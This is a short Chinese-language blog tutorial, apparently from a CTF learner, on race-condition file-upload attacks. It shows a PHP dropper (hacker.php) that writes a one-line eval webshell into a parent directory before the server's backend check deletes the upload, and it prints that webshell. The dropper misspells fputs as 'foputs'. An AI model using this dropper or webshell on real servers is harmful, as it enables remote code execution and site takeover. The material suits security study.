zoukankan      html  css  js  c++  java
  • 竞争条件攻击

    竞争条件攻击属于文件上传漏洞的一种。

    一些网站上传文件的逻辑是先允许上传文件,再检测文件中是否包含webshell的脚本,如果存在则删除webshell文件。

    但是攻击者可以利用上传文件和删除文件的时间差来完成文件上传漏洞攻击。

    攻击者可以上传类似代码hacker.php:

    <?php
      foputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>');
    ?>

    访问文件时,文件代码会执行,在hacker.php文件所在目录下新建一个shell.php,内容即:

    <?php @eval($_POST[a]) ?>

    旧的webshell文件本来就只是一个垫脚石的存在,删不删除无所谓,我们利用新建的webshell文件可以进行漏洞攻击

    竞争条件攻击只试用于绕过后端的检测,对于绕过前端代码检测方法是没有用的。

    如果攻击者能讲两者很好得结合起来,说不定会有成效。

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    MySQL 对于千万级的大表要怎么优化?
    Spring Cloud中文社区
    什么是QPS,PV
    http://www.rabbitmq.com/documentation.html
    redis
    MySQL分区表
    linux命令综合
    Python-MRO
    Python3 错误和异常
    装饰器
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12296235.html
Copyright © 2011-2022 走看看